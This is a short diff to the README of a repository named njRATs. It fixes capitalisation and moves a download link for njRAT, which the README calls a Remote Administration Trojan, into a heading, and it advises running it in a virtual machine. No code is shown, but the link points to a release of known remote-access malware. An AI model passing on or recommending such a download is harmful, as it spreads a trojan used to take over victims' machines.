st2o1/njRATs/README.md

 # njRAT
 <center>
-  NjRAT is a Remote Administration Trojan.
+  njRAT is a Remote Administration Trojan.
-  <a href=https://github.com/st2o1/NjRATs/releases/tag/njRAT> Download njRAT </a>
 </center>

+#  <a href=https://github.com/st2o1/NjRATs/releases/tag/njRAT> Download njRAT </a>

 # Please Use this repository on a Virtual Machine.